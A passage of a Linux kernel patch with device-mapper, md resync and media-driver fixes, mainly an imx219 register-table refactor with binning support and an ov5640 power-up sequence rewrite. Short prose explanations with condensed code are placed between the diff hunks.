+ void dm_put_table_device(struct mapped_device *md, struct dm_dev *d);
+ 
+ int dm_kobject_uevent(struct mapped_device *md, enum kobject_action action,
+-		      unsigned cookie);
++		      unsigned cookie, bool need_resize_uevent);
+ 
+ void dm_internal_suspend(struct mapped_device *md);
+ void dm_internal_resume(struct mapped_device *md);
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index b911085060dc3..0368b3c51c7f7 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -9039,7 +9039,7 @@ void md_do_sync(struct md_thread *thread)
+ 	mddev->pers->sync_request(mddev, max_sectors, &skipped);
+ 
+ 	if (!test_bit(MD_RECOVERY_CHECK, &mddev->recovery) &&
+-	    mddev->curr_resync >= MD_RESYNC_ACTIVE) {
++	    mddev->curr_resync > MD_RESYNC_ACTIVE) {
+ 		if (test_bit(MD_RECOVERY_SYNC, &mddev->recovery)) {
+ 			if (test_bit(MD_RECOVERY_INTR, &mddev->recovery)) {
+ 				if (mddev->curr_resync >= mddev->recovery_cp) {
+diff --git a/drivers/media/i2c/imx219.c b/drivers/media/i2c/imx219.c
+index 77bd79a5954ed..7a14688f8c228 100644
+--- a/drivers/media/i2c/imx219.c
++++ b/drivers/media/i2c/imx219.c
+@@ -89,6 +89,12 @@
+ 
+ #define IMX219_REG_ORIENTATION		0x0172
+ 
++/* Binning  Mode */
++#define IMX219_REG_BINNING_MODE		0x0174
++#define IMX219_BINNING_NONE		0x0000
++#define IMX219_BINNING_2X2		0x0101
++#define IMX219_BINNING_2X2_ANALOG	0x0303
++
+ /* Test Pattern Control */
+ #define IMX219_REG_TEST_PATTERN		0x0600
+ #define IMX219_TEST_PATTERN_DISABLE	0
+@@ -143,25 +149,66 @@ struct imx219_mode {
+ 
+ 	/* Default register values */
+ 	struct imx219_reg_list reg_list;
++
++	/* 2x2 binning is used */
++	bool binning;
+ };
+ 
+-/*
+- * Register sets lifted off the i2C interface from the Raspberry Pi firmware
+- * driver.
+- * 3280x2464 = mode 2, 1920x1080 = mode 1, 1640x1232 = mode 4, 640x480 = mode 7.
+- */
+-static const struct imx219_reg mode_3280x2464_regs[] = {
+-	{0x0100, 0x00},
++static const struct imx219_reg imx219_common_regs[] = {
++	{0x0100, 0x00},	/* Mode Select */
++
++	/* To Access Addresses 3000-5fff, send the following commands */
+ 	{0x30eb, 0x0c},
+ 	{0x30eb, 0x05},
+ 	{0x300a, 0xff},
+ 	{0x300b, 0xff},
+ 	{0x30eb, 0x05},
+ 	{0x30eb, 0x09},
+-	{0x0114, 0x01},
+-	{0x0128, 0x00},
+-	{0x012a, 0x18},
++
++	/* PLL Clock Table */
++	{0x0301, 0x05},	/* VTPXCK_DIV */
++	{0x0303, 0x01},	/* VTSYSCK_DIV */
++	{0x0304, 0x03},	/* PREPLLCK_VT_DIV 0x03 = AUTO set */
++	{0x0305, 0x03}, /* PREPLLCK_OP_DIV 0x03 = AUTO set */
++	{0x0306, 0x00},	/* PLL_VT_MPY */
++	{0x0307, 0x39},
++	{0x030b, 0x01},	/* OP_SYS_CLK_DIV */
++	{0x030c, 0x00},	/* PLL_OP_MPY */
++	{0x030d, 0x72},
++
++	/* Undocumented registers */
++	{0x455e, 0x00},
++	{0x471e, 0x4b},
++	{0x4767, 0x0f},
++	{0x4750, 0x14},
++	{0x4540, 0x00},
++	{0x47b4, 0x14},
++	{0x4713, 0x30},
++	{0x478b, 0x10},
++	{0x478f, 0x10},
++	{0x4793, 0x10},
++	{0x4797, 0x0e},
++	{0x479b, 0x0e},
++
++	/* Frame Bank Register Group "A" */
++	{0x0162, 0x0d},	/* Line_Length_A */
++	{0x0163, 0x78},
++	{0x0170, 0x01}, /* X_ODD_INC_A */
++	{0x0171, 0x01}, /* Y_ODD_INC_A */
++
++	/* Output setup registers */
++	{0x0114, 0x01},	/* CSI 2-Lane Mode */
++	{0x0128, 0x00},	/* DPHY Auto Mode */
++	{0x012a, 0x18},	/* EXCK_Freq */
+ 	{0x012b, 0x00},
++};
++
++/*
++ * Register sets lifted off the i2C interface from the Raspberry Pi firmware
++ * driver.
++ * 3280x2464 = mode 2, 1920x1080 = mode 1, 1640x1232 = mode 4, 640x480 = mode 7.
++ */
++static const struct imx219_reg mode_3280x2464_regs[] = {
+ 	{0x0164, 0x00},
+ 	{0x0165, 0x00},
+ 	{0x0166, 0x0c},
+@@ -174,53 +221,13 @@ static const struct imx219_reg mode_3280x2464_regs[] = {
+ 	{0x016d, 0xd0},
+ 	{0x016e, 0x09},
+ 	{0x016f, 0xa0},
+-	{0x0170, 0x01},
+-	{0x0171, 0x01},
+-	{0x0174, 0x00},
+-	{0x0175, 0x00},
+-	{0x0301, 0x05},
+-	{0x0303, 0x01},
+-	{0x0304, 0x03},
+-	{0x0305, 0x03},
+-	{0x0306, 0x00},
+-	{0x0307, 0x39},
+-	{0x030b, 0x01},
+-	{0x030c, 0x00},
+-	{0x030d, 0x72},
+ 	{0x0624, 0x0c},
+ 	{0x0625, 0xd0},
+ 	{0x0626, 0x09},
+ 	{0x0627, 0xa0},
+-	{0x455e, 0x00},
+-	{0x471e, 0x4b},
+-	{0x4767, 0x0f},
+-	{0x4750, 0x14},
+-	{0x4540, 0x00},
+-	{0x47b4, 0x14},
+-	{0x4713, 0x30},
+-	{0x478b, 0x10},
+-	{0x478f, 0x10},
+-	{0x4793, 0x10},
+-	{0x4797, 0x0e},
+-	{0x479b, 0x0e},
+-	{0x0162, 0x0d},
+-	{0x0163, 0x78},
+ };
+ 
+ static const struct imx219_reg mode_1920_1080_regs[] = {
+-	{0x0100, 0x00},
+-	{0x30eb, 0x05},
+-	{0x30eb, 0x0c},
+-	{0x300a, 0xff},
+-	{0x300b, 0xff},
+-	{0x30eb, 0x05},
+-	{0x30eb, 0x09},
+-	{0x0114, 0x01},
+-	{0x0128, 0x00},
+-	{0x012a, 0x18},
+-	{0x012b, 0x00},
+-	{0x0162, 0x0d},
+-	{0x0163, 0x78},
+ 	{0x0164, 0x02},
+ 	{0x0165, 0xa8},
+ 	{0x0166, 0x0a},
+@@ -233,49 +240,13 @@ static const struct imx219_reg mode_1920_1080_regs[] = {
+ 	{0x016d, 0x80},
+ 	{0x016e, 0x04},
+ 	{0x016f, 0x38},
+-	{0x0170, 0x01},
+-	{0x0171, 0x01},
+-	{0x0174, 0x00},
+-	{0x0175, 0x00},
+-	{0x0301, 0x05},
+-	{0x0303, 0x01},
+-	{0x0304, 0x03},
+-	{0x0305, 0x03},
+-	{0x0306, 0x00},
+-	{0x0307, 0x39},
+-	{0x030b, 0x01},
+-	{0x030c, 0x00},
+-	{0x030d, 0x72},
+ 	{0x0624, 0x07},
+ 	{0x0625, 0x80},
+ 	{0x0626, 0x04},
+ 	{0x0627, 0x38},
+-	{0x455e, 0x00},
+-	{0x471e, 0x4b},
+-	{0x4767, 0x0f},
+-	{0x4750, 0x14},
+-	{0x4540, 0x00},
+-	{0x47b4, 0x14},
+-	{0x4713, 0x30},
+-	{0x478b, 0x10},
+-	{0x478f, 0x10},
+-	{0x4793, 0x10},
+-	{0x4797, 0x0e},
+-	{0x479b, 0x0e},
+ };
+ 
+ static const struct imx219_reg mode_1640_1232_regs[] = {
+-	{0x0100, 0x00},
+-	{0x30eb, 0x0c},
+-	{0x30eb, 0x05},
+-	{0x300a, 0xff},
+-	{0x300b, 0xff},
+-	{0x30eb, 0x05},
+-	{0x30eb, 0x09},
+-	{0x0114, 0x01},
+-	{0x0128, 0x00},
+-	{0x012a, 0x18},
+-	{0x012b, 0x00},
+ 	{0x0164, 0x00},
+ 	{0x0165, 0x00},
+ 	{0x0166, 0x0c},
+@@ -288,53 +259,13 @@ static const struct imx219_reg mode_1640_1232_regs[] = {
+ 	{0x016d, 0x68},
+ 	{0x016e, 0x04},
+ 	{0x016f, 0xd0},
+-	{0x0170, 0x01},
+-	{0x0171, 0x01},
+-	{0x0174, 0x01},
+-	{0x0175, 0x01},
+-	{0x0301, 0x05},
+-	{0x0303, 0x01},
+-	{0x0304, 0x03},
+-	{0x0305, 0x03},
+-	{0x0306, 0x00},
+-	{0x0307, 0x39},
+-	{0x030b, 0x01},
+-	{0x030c, 0x00},
+-	{0x030d, 0x72},
+ 	{0x0624, 0x06},
+ 	{0x0625, 0x68},
+ 	{0x0626, 0x04},
+ 	{0x0627, 0xd0},
+-	{0x455e, 0x00},
+-	{0x471e, 0x4b},
+-	{0x4767, 0x0f},
+-	{0x4750, 0x14},
+-	{0x4540, 0x00},
+-	{0x47b4, 0x14},
+-	{0x4713, 0x30},
+-	{0x478b, 0x10},
+-	{0x478f, 0x10},
+-	{0x4793, 0x10},
+-	{0x4797, 0x0e},
+-	{0x479b, 0x0e},
+-	{0x0162, 0x0d},
+-	{0x0163, 0x78},
+ };
+ 
+ static const struct imx219_reg mode_640_480_regs[] = {
+-	{0x0100, 0x00},
+-	{0x30eb, 0x05},
+-	{0x30eb, 0x0c},
+-	{0x300a, 0xff},
+-	{0x300b, 0xff},
+-	{0x30eb, 0x05},
+-	{0x30eb, 0x09},
+-	{0x0114, 0x01},
+-	{0x0128, 0x00},
+-	{0x012a, 0x18},
+-	{0x012b, 0x00},
+-	{0x0162, 0x0d},
+-	{0x0163, 0x78},
+ 	{0x0164, 0x03},
+ 	{0x0165, 0xe8},
+ 	{0x0166, 0x08},
+@@ -347,35 +278,10 @@ static const struct imx219_reg mode_640_480_regs[] = {
+ 	{0x016d, 0x80},
+ 	{0x016e, 0x01},
+ 	{0x016f, 0xe0},
+-	{0x0170, 0x01},
+-	{0x0171, 0x01},
+-	{0x0174, 0x03},
+-	{0x0175, 0x03},
+-	{0x0301, 0x05},
+-	{0x0303, 0x01},
+-	{0x0304, 0x03},
+-	{0x0305, 0x03},
+-	{0x0306, 0x00},
+-	{0x0307, 0x39},
+-	{0x030b, 0x01},
+-	{0x030c, 0x00},
+-	{0x030d, 0x72},
+ 	{0x0624, 0x06},
+ 	{0x0625, 0x68},
+ 	{0x0626, 0x04},
+ 	{0x0627, 0xd0},
+-	{0x455e, 0x00},
+-	{0x471e, 0x4b},
+-	{0x4767, 0x0f},
+-	{0x4750, 0x14},
+-	{0x4540, 0x00},
+-	{0x47b4, 0x14},
+-	{0x4713, 0x30},
+-	{0x478b, 0x10},
+-	{0x478f, 0x10},
+-	{0x4793, 0x10},
+-	{0x4797, 0x0e},
+-	{0x479b, 0x0e},
+ };
+ 
+ static const struct imx219_reg raw8_framefmt_regs[] = {
+@@ -485,6 +391,7 @@ static const struct imx219_mode supported_modes[] = {
+ 			.num_of_regs = ARRAY_SIZE(mode_3280x2464_regs),
+ 			.regs = mode_3280x2464_regs,
+ 		},
++		.binning = false,
+ 	},
+ 	{
+ 		/* 1080P 30fps cropped */
+@@ -501,6 +408,7 @@ static const struct imx219_mode supported_modes[] = {
+ 			.num_of_regs = ARRAY_SIZE(mode_1920_1080_regs),
+ 			.regs = mode_1920_1080_regs,
+ 		},
++		.binning = false,
+ 	},
+ 	{
+ 		/* 2x2 binned 30fps mode */
+@@ -517,6 +425,7 @@ static const struct imx219_mode supported_modes[] = {
+ 			.num_of_regs = ARRAY_SIZE(mode_1640_1232_regs),
+ 			.regs = mode_1640_1232_regs,
+ 		},
++		.binning = true,
+ 	},
+ 	{
+ 		/* 640x480 30fps mode */
+@@ -533,6 +442,7 @@ static const struct imx219_mode supported_modes[] = {
+ 			.num_of_regs = ARRAY_SIZE(mode_640_480_regs),
+ 			.regs = mode_640_480_regs,
+ 		},
++		.binning = true,
+ 	},
+ };
+ 
+@@ -979,6 +889,35 @@ static int imx219_set_framefmt(struct imx219 *imx219)
+ 	return -EINVAL;
+ }
+ 
++static int imx219_set_binning(struct imx219 *imx219)
++{
++	if (!imx219->mode->binning) {
++		return imx219_write_reg(imx219, IMX219_REG_BINNING_MODE,
++					IMX219_REG_VALUE_16BIT,
++					IMX219_BINNING_NONE);
++	}
++
++	switch (imx219->fmt.code) {
++	case MEDIA_BUS_FMT_SRGGB8_1X8:
++	case MEDIA_BUS_FMT_SGRBG8_1X8:
++	case MEDIA_BUS_FMT_SGBRG8_1X8:
++	case MEDIA_BUS_FMT_SBGGR8_1X8:
++		return imx219_write_reg(imx219, IMX219_REG_BINNING_MODE,
++					IMX219_REG_VALUE_16BIT,
++					IMX219_BINNING_2X2_ANALOG);
++
++	case MEDIA_BUS_FMT_SRGGB10_1X10:
++	case MEDIA_BUS_FMT_SGRBG10_1X10:
++	case MEDIA_BUS_FMT_SGBRG10_1X10:
++	case MEDIA_BUS_FMT_SBGGR10_1X10:
++		return imx219_write_reg(imx219, IMX219_REG_BINNING_MODE,
++					IMX219_REG_VALUE_16BIT,
++					IMX219_BINNING_2X2);
++	}
++
++	return -EINVAL;
++}
++
+ static const struct v4l2_rect *
+ __imx219_get_pad_crop(struct imx219 *imx219,
+ 		      struct v4l2_subdev_state *sd_state,
+@@ -1041,6 +980,13 @@ static int imx219_start_streaming(struct imx219 *imx219)
+ 	if (ret < 0)
+ 		return ret;
+ 
++	/* Send all registers that are common to all modes */
++	ret = imx219_write_regs(imx219, imx219_common_regs, ARRAY_SIZE(imx219_common_regs));
++	if (ret) {
++		dev_err(&client->dev, "%s failed to send mfg header\n", __func__);
++		goto err_rpm_put;
++	}
++
+ 	/* Apply default values of current mode */
+ 	reg_list = &imx219->mode->reg_list;
+ 	ret = imx219_write_regs(imx219, reg_list->regs, reg_list->num_of_regs);
+@@ -1056,6 +1002,13 @@ static int imx219_start_streaming(struct imx219 *imx219)
+ 		goto err_rpm_put;
+ 	}
+ 
++	ret = imx219_set_binning(imx219);
++	if (ret) {
++		dev_err(&client->dev, "%s failed to set binning: %d\n",
++			__func__, ret);
++		goto err_rpm_put;
++	}
++
+ 	/* Apply customized values from user */
+ 	ret =  __v4l2_ctrl_handler_setup(imx219->sd.ctrl_handler);
+ 	if (ret)
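
The imx219 refactor hoists everything the four mode tables shared (register-access unlock, PLL setup, undocumented registers, line length, output setup) into imx219_common_regs, leaving the per-mode tables with only cropping and output-size values, and programs binning explicitly from the mode and bus format. The resulting bring-up order in imx219_start_streaming(), abridged:

        imx219_write_regs(imx219, imx219_common_regs,
                          ARRAY_SIZE(imx219_common_regs)); /* shared setup */
        imx219_write_regs(imx219, reg_list->regs, reg_list->num_of_regs);
        imx219_set_framefmt(imx219);    /* RAW8 vs RAW10 */
        imx219_set_binning(imx219);     /* none, 2x2, or 2x2 analog */
        __v4l2_ctrl_handler_setup(imx219->sd.ctrl_handler);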
+diff --git a/drivers/media/i2c/max9286.c b/drivers/media/i2c/max9286.c
+index 9c083cf142319..d034a67042e35 100644
+--- a/drivers/media/i2c/max9286.c
++++ b/drivers/media/i2c/max9286.c
+@@ -932,6 +932,7 @@ static int max9286_v4l2_register(struct max9286_priv *priv)
+ err_put_node:
+ 	fwnode_handle_put(ep);
+ err_async:
++	v4l2_ctrl_handler_free(&priv->ctrls);
+ 	max9286_v4l2_notifier_unregister(priv);
+ 
+ 	return ret;
+diff --git a/drivers/media/i2c/ov2740.c b/drivers/media/i2c/ov2740.c
+index 5d74ad4792146..628ab86698c08 100644
+--- a/drivers/media/i2c/ov2740.c
++++ b/drivers/media/i2c/ov2740.c
+@@ -630,8 +630,10 @@ static int ov2740_init_controls(struct ov2740 *ov2740)
+ 				     V4L2_CID_TEST_PATTERN,
+ 				     ARRAY_SIZE(ov2740_test_pattern_menu) - 1,
+ 				     0, 0, ov2740_test_pattern_menu);
+-	if (ctrl_hdlr->error)
++	if (ctrl_hdlr->error) {
++		v4l2_ctrl_handler_free(ctrl_hdlr);
+ 		return ctrl_hdlr->error;
++	}
+ 
+ 	ov2740->sd.ctrl_handler = ctrl_hdlr;
+ 
+diff --git a/drivers/media/i2c/ov5640.c b/drivers/media/i2c/ov5640.c
+index 3f6d715efa823..873087e180561 100644
+--- a/drivers/media/i2c/ov5640.c
++++ b/drivers/media/i2c/ov5640.c
+@@ -50,6 +50,7 @@
+ #define OV5640_REG_SYS_CTRL0		0x3008
+ #define OV5640_REG_SYS_CTRL0_SW_PWDN	0x42
+ #define OV5640_REG_SYS_CTRL0_SW_PWUP	0x02
++#define OV5640_REG_SYS_CTRL0_SW_RST	0x82
+ #define OV5640_REG_CHIP_ID		0x300a
+ #define OV5640_REG_IO_MIPI_CTRL00	0x300e
+ #define OV5640_REG_PAD_OUTPUT_ENABLE01	0x3017
+@@ -532,7 +533,7 @@ static const struct v4l2_mbus_framefmt ov5640_default_fmt = {
+ };
+ 
+ static const struct reg_value ov5640_init_setting[] = {
+-	{0x3103, 0x11, 0, 0}, {0x3008, 0x82, 0, 5}, {0x3008, 0x42, 0, 0},
++	{0x3103, 0x11, 0, 0},
+ 	{0x3103, 0x03, 0, 0}, {0x3630, 0x36, 0, 0},
+ 	{0x3631, 0x0e, 0, 0}, {0x3632, 0xe2, 0, 0}, {0x3633, 0x12, 0, 0},
+ 	{0x3621, 0xe0, 0, 0}, {0x3704, 0xa0, 0, 0}, {0x3703, 0x5a, 0, 0},
+@@ -2424,24 +2425,48 @@ static void ov5640_power(struct ov5640_dev *sensor, bool enable)
+ 	gpiod_set_value_cansleep(sensor->pwdn_gpio, enable ? 0 : 1);
+ }
+ 
+-static void ov5640_reset(struct ov5640_dev *sensor)
++/*
++ * From section 2.7 power up sequence:
++ * t0 + t1 + t2 >= 5ms	Delay from DOVDD stable to PWDN pull down
++ * t3 >= 1ms		Delay from PWDN pull down to RESETB pull up
++ * t4 >= 20ms		Delay from RESETB pull up to SCCB (i2c) stable
++ *
++ * Some modules don't expose RESETB/PWDN pins directly, instead providing a
++ * "PWUP" GPIO which is wired through appropriate delays and inverters to the
++ * pins.
++ *
++ * In such cases, this gpio should be mapped to pwdn_gpio in the driver, and we
++ * should still toggle the pwdn_gpio below with the appropriate delays, while
++ * the calls to reset_gpio will be ignored.
++ */
++static void ov5640_powerup_sequence(struct ov5640_dev *sensor)
+ {
+-	if (!sensor->reset_gpio)
+-		return;
+-
+-	gpiod_set_value_cansleep(sensor->reset_gpio, 0);
++	if (sensor->pwdn_gpio) {
++		gpiod_set_value_cansleep(sensor->reset_gpio, 0);
+ 
+-	/* camera power cycle */
+-	ov5640_power(sensor, false);
+-	usleep_range(5000, 10000);
+-	ov5640_power(sensor, true);
+-	usleep_range(5000, 10000);
++		/* camera power cycle */
++		ov5640_power(sensor, false);
++		usleep_range(5000, 10000);
++		ov5640_power(sensor, true);
++		usleep_range(5000, 10000);
+ 
+-	gpiod_set_value_cansleep(sensor->reset_gpio, 1);
+-	usleep_range(1000, 2000);
++		gpiod_set_value_cansleep(sensor->reset_gpio, 1);
++		usleep_range(1000, 2000);
+ 
+-	gpiod_set_value_cansleep(sensor->reset_gpio, 0);
++		gpiod_set_value_cansleep(sensor->reset_gpio, 0);
++	} else {
++		/* software reset */
++		ov5640_write_reg(sensor, OV5640_REG_SYS_CTRL0,
++				 OV5640_REG_SYS_CTRL0_SW_RST);
++	}
+ 	usleep_range(20000, 25000);
++
++	/*
++	 * software standby: allows registers programming;
++	 * exit at restore_mode() for CSI, s_stream(1) for DVP
++	 */
++	ov5640_write_reg(sensor, OV5640_REG_SYS_CTRL0,
++			 OV5640_REG_SYS_CTRL0_SW_PWDN);
+ }
+ 
+ static int ov5640_set_power_on(struct ov5640_dev *sensor)
+@@ -2464,8 +2489,7 @@ static int ov5640_set_power_on(struct ov5640_dev *sensor)
+ 		goto xclk_off;
+ 	}
+ 
+-	ov5640_reset(sensor);
+-	ov5640_power(sensor, true);
++	ov5640_powerup_sequence(sensor);
+ 
+ 	ret = ov5640_init_slave_id(sensor);
+ 	if (ret)
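
ov5640_powerup_sequence() keeps the GPIO-based hardware reset for modules that expose PWDN/RESETB and falls back to a software reset through SYS_CTRL0 when they do not; either way the sensor is then parked in software power-down so registers can be programmed. Condensed, with a hypothetical toggle_power_and_reset_gpios() standing in for the GPIO dance:

        if (sensor->pwdn_gpio) {
                toggle_power_and_reset_gpios(sensor);   /* hw reset path */
        } else {
                ov5640_write_reg(sensor, OV5640_REG_SYS_CTRL0,
                                 OV5640_REG_SYS_CTRL0_SW_RST);  /* 0x82 */
        }
        usleep_range(20000, 25000);     /* t4: wait for SCCB to stabilize */
        ov5640_write_reg(sensor, OV5640_REG_SYS_CTRL0,
                         OV5640_REG_SYS_CTRL0_SW_PWDN); /* soft standby */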
+diff --git a/drivers/media/i2c/ov5675.c b/drivers/media/i2c/ov5675.c
+index 94dc8cb7a7c00..a6e6b367d1283 100644
+--- a/drivers/media/i2c/ov5675.c
++++ b/drivers/media/i2c/ov5675.c
+@@ -820,8 +820,10 @@ static int ov5675_init_controls(struct ov5675 *ov5675)
+ 	v4l2_ctrl_new_std(ctrl_hdlr, &ov5675_ctrl_ops,
+ 			  V4L2_CID_VFLIP, 0, 1, 1, 0);
+ 
+-	if (ctrl_hdlr->error)
++	if (ctrl_hdlr->error) {
++		v4l2_ctrl_handler_free(ctrl_hdlr);
+ 		return ctrl_hdlr->error;
++	}
+ 
+ 	ov5675->sd.ctrl_handler = ctrl_hdlr;
+ 
+diff --git a/drivers/media/i2c/ov7670.c b/drivers/media/i2c/ov7670.c
+index 4b9b156b53c7a..c06364c1cbd1b 100644
+--- a/drivers/media/i2c/ov7670.c
++++ b/drivers/media/i2c/ov7670.c
+@@ -1841,7 +1841,7 @@ static int ov7670_parse_dt(struct device *dev,
+ 
+ 	if (bus_cfg.bus_type != V4L2_MBUS_PARALLEL) {
+ 		dev_err(dev, "Unsupported media bus type\n");
+-		return ret;
++		return -EINVAL;
+ 	}
+ 	info->mbus_config = bus_cfg.bus.parallel.flags;
+ 
+diff --git a/drivers/media/i2c/ov772x.c b/drivers/media/i2c/ov772x.c
+index 4189e3fc3d535..a238e63425f8c 100644
+--- a/drivers/media/i2c/ov772x.c
++++ b/drivers/media/i2c/ov772x.c
+@@ -1462,7 +1462,7 @@ static int ov772x_probe(struct i2c_client *client)
+ 	priv->subdev.ctrl_handler = &priv->hdl;
+ 	if (priv->hdl.error) {
+ 		ret = priv->hdl.error;
+-		goto error_mutex_destroy;
++		goto error_ctrl_free;
+ 	}
+ 
+ 	priv->clk = clk_get(&client->dev, NULL);
+@@ -1515,7 +1515,6 @@ error_clk_put:
+ 	clk_put(priv->clk);
+ error_ctrl_free:
+ 	v4l2_ctrl_handler_free(&priv->hdl);
+-error_mutex_destroy:
+ 	mutex_destroy(&priv->lock);
+ 
+ 	return ret;
+diff --git a/drivers/media/mc/mc-entity.c b/drivers/media/mc/mc-entity.c
+index b8bcbc734eaf4..f268cf66053e1 100644
+--- a/drivers/media/mc/mc-entity.c
++++ b/drivers/media/mc/mc-entity.c
+@@ -703,7 +703,7 @@ done:
+ __must_check int __media_pipeline_start(struct media_pad *pad,
+ 					struct media_pipeline *pipe)
+ {
+-	struct media_device *mdev = pad->entity->graph_obj.mdev;
++	struct media_device *mdev = pad->graph_obj.mdev;
+ 	struct media_pipeline_pad *err_ppad;
+ 	struct media_pipeline_pad *ppad;
+ 	int ret;
+@@ -851,7 +851,7 @@ EXPORT_SYMBOL_GPL(__media_pipeline_start);
+ __must_check int media_pipeline_start(struct media_pad *pad,
+ 				      struct media_pipeline *pipe)
+ {
+-	struct media_device *mdev = pad->entity->graph_obj.mdev;
++	struct media_device *mdev = pad->graph_obj.mdev;
+ 	int ret;
+ 
+ 	mutex_lock(&mdev->graph_mutex);
+@@ -888,7 +888,7 @@ EXPORT_SYMBOL_GPL(__media_pipeline_stop);
+ 
+ void media_pipeline_stop(struct media_pad *pad)
+ {
+-	struct media_device *mdev = pad->entity->graph_obj.mdev;
++	struct media_device *mdev = pad->graph_obj.mdev;
+ 
+ 	mutex_lock(&mdev->graph_mutex);
+ 	__media_pipeline_stop(pad);
+@@ -898,7 +898,7 @@ EXPORT_SYMBOL_GPL(media_pipeline_stop);
+ 
+ __must_check int media_pipeline_alloc_start(struct media_pad *pad)
+ {
+-	struct media_device *mdev = pad->entity->graph_obj.mdev;
++	struct media_device *mdev = pad->graph_obj.mdev;
+ 	struct media_pipeline *new_pipe = NULL;
+ 	struct media_pipeline *pipe;
+ 	int ret;
+diff --git a/drivers/media/pci/intel/ipu3/ipu3-cio2-main.c b/drivers/media/pci/intel/ipu3/ipu3-cio2-main.c
+index 390bd5ea34724..3b76a9d0383a8 100644
+--- a/drivers/media/pci/intel/ipu3/ipu3-cio2-main.c
++++ b/drivers/media/pci/intel/ipu3/ipu3-cio2-main.c
+@@ -1843,6 +1843,9 @@ static void cio2_pci_remove(struct pci_dev *pci_dev)
+ 	v4l2_device_unregister(&cio2->v4l2_dev);
+ 	media_device_cleanup(&cio2->media_dev);
+ 	mutex_destroy(&cio2->lock);
++
++	pm_runtime_forbid(&pci_dev->dev);
++	pm_runtime_get_noresume(&pci_dev->dev);
+ }
+ 
+ static int __maybe_unused cio2_runtime_suspend(struct device *dev)
+diff --git a/drivers/media/pci/saa7134/saa7134-core.c b/drivers/media/pci/saa7134/saa7134-core.c
+index 96328b0af1641..cf2871306987c 100644
+--- a/drivers/media/pci/saa7134/saa7134-core.c
++++ b/drivers/media/pci/saa7134/saa7134-core.c
+@@ -978,7 +978,7 @@ static void saa7134_unregister_video(struct saa7134_dev *dev)
+ 	}
+ 	if (dev->radio_dev) {
+ 		if (video_is_registered(dev->radio_dev))
+-			vb2_video_unregister_device(dev->radio_dev);
++			video_unregister_device(dev->radio_dev);
+ 		else
+ 			video_device_release(dev->radio_dev);
+ 		dev->radio_dev = NULL;
+diff --git a/drivers/media/platform/amphion/vpu_color.c b/drivers/media/platform/amphion/vpu_color.c
+index 80b9a53fd1c14..4ae435cbc5cda 100644
+--- a/drivers/media/platform/amphion/vpu_color.c
++++ b/drivers/media/platform/amphion/vpu_color.c
+@@ -17,7 +17,7 @@
+ #include "vpu_helpers.h"
+ 
+ static const u8 colorprimaries[] = {
+-	0,
++	V4L2_COLORSPACE_LAST,
+ 	V4L2_COLORSPACE_REC709,         /*Rec. ITU-R BT.709-6*/
+ 	0,
+ 	0,
+@@ -31,7 +31,7 @@ static const u8 colorprimaries[] = {
+ };
+ 
+ static const u8 colortransfers[] = {
+-	0,
++	V4L2_XFER_FUNC_LAST,
+ 	V4L2_XFER_FUNC_709,             /*Rec. ITU-R BT.709-6*/
+ 	0,
+ 	0,
+@@ -53,7 +53,7 @@ static const u8 colortransfers[] = {
+ };
+ 
+ static const u8 colormatrixcoefs[] = {
+-	0,
++	V4L2_YCBCR_ENC_LAST,
+ 	V4L2_YCBCR_ENC_709,              /*Rec. ITU-R BT.709-6*/
+ 	0,
+ 	0,
+diff --git a/drivers/media/platform/mediatek/mdp3/Kconfig b/drivers/media/platform/mediatek/mdp3/Kconfig
+index 50ae07b75b5f2..602329c447501 100644
+--- a/drivers/media/platform/mediatek/mdp3/Kconfig
++++ b/drivers/media/platform/mediatek/mdp3/Kconfig
+@@ -3,15 +3,13 @@ config VIDEO_MEDIATEK_MDP3
+ 	tristate "MediaTek MDP v3 driver"
+ 	depends on MTK_IOMMU || COMPILE_TEST
+ 	depends on VIDEO_DEV
+-	depends on ARCH_MEDIATEK || COMPILE_TEST
+ 	depends on HAS_DMA
+ 	depends on REMOTEPROC
++	depends on MTK_MMSYS
++	depends on MTK_CMDQ
++	depends on MTK_SCP
+ 	select VIDEOBUF2_DMA_CONTIG
+ 	select V4L2_MEM2MEM_DEV
+-	select MTK_MMSYS
+-	select VIDEO_MEDIATEK_VPU
+-	select MTK_CMDQ
+-	select MTK_SCP
+ 	default n
+ 	help
+ 	    It is a v4l2 driver and present in MediaTek MT8183 SoC.
+diff --git a/drivers/media/platform/mediatek/mdp3/mtk-mdp3-core.c b/drivers/media/platform/mediatek/mdp3/mtk-mdp3-core.c
+index 2d1f6ae9f0802..97edcd9d1c817 100644
+--- a/drivers/media/platform/mediatek/mdp3/mtk-mdp3-core.c
++++ b/drivers/media/platform/mediatek/mdp3/mtk-mdp3-core.c
+@@ -207,8 +207,8 @@ static int mdp_probe(struct platform_device *pdev)
+ 	}
+ 	for (i = 0; i < MDP_PIPE_MAX; i++) {
+ 		mdp->mdp_mutex[i] = mtk_mutex_get(&mm_pdev->dev);
+-		if (!mdp->mdp_mutex[i]) {
+-			ret = -ENODEV;
++		if (IS_ERR(mdp->mdp_mutex[i])) {
++			ret = PTR_ERR(mdp->mdp_mutex[i]);
+ 			goto err_free_mutex;
+ 		}
+ 	}
+@@ -289,7 +289,8 @@ err_deinit_comp:
+ 	mdp_comp_destroy(mdp);
+ err_free_mutex:
+ 	for (i = 0; i < MDP_PIPE_MAX; i++)
+-		mtk_mutex_put(mdp->mdp_mutex[i]);
++		if (!IS_ERR_OR_NULL(mdp->mdp_mutex[i]))
++			mtk_mutex_put(mdp->mdp_mutex[i]);
+ err_destroy_device:
+ 	kfree(mdp);
+ err_return:
+diff --git a/drivers/media/platform/nxp/imx-jpeg/mxc-jpeg.c b/drivers/media/platform/nxp/imx-jpeg/mxc-jpeg.c
+index 32fd04a3d8bb7..81a44702a5413 100644
+--- a/drivers/media/platform/nxp/imx-jpeg/mxc-jpeg.c
++++ b/drivers/media/platform/nxp/imx-jpeg/mxc-jpeg.c
+@@ -2202,19 +2202,12 @@ static int mxc_jpeg_probe(struct platform_device *pdev)
+ 	jpeg->mode = mode;
+ 
+ 	/* Get clocks */
+-	jpeg->clk_ipg = devm_clk_get(dev, "ipg");
+-	if (IS_ERR(jpeg->clk_ipg)) {
+-		dev_err(dev, "failed to get clock: ipg\n");
+-		ret = PTR_ERR(jpeg->clk_ipg);
+-		goto err_clk;
+-	}
+-
+-	jpeg->clk_per = devm_clk_get(dev, "per");
+-	if (IS_ERR(jpeg->clk_per)) {
+-		dev_err(dev, "failed to get clock: per\n");
+-		ret = PTR_ERR(jpeg->clk_per);
